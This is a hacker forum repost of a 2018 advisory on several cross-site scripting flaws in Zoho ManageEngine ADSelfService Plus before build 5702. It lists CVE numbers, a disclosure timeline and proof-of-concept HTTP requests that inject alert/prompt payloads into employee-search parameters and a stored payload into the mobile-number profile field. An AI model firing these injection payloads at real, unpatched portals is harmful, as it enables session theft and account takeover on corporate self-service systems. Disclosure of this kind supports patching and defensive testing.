跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?


[+] TimeLine
	[-] Nov 23, 2018	Reported
	[-] Nov 26, 2018	Triaged
	[-] Dec 27, 2018 	Fixed
	[-] May 08, 2019	Public Disclosure

[+] Description:
	Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites

[+] POC

[-] Employee search form

POST /EmployeeSearch.cc?actionId=Search HTTP/1.1

searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
searchType parameter:
searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=


2- Employee Search – ascending parameter

/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1

selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=


3- EmpSearch.cc - searchString parameter

POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1

&adscsrf=

4- Stored XSS in self-update layout implementation.

/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
Insert the following payload into Mobile Number field, and save
Payload: 11111111]";a=alert,a(31337)//
Code execute here:
/Enrollment.do?selectedTab=Enrollment


[+] Assigned CVE:  CVE-2018-20484,CVE-2018-20485
[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。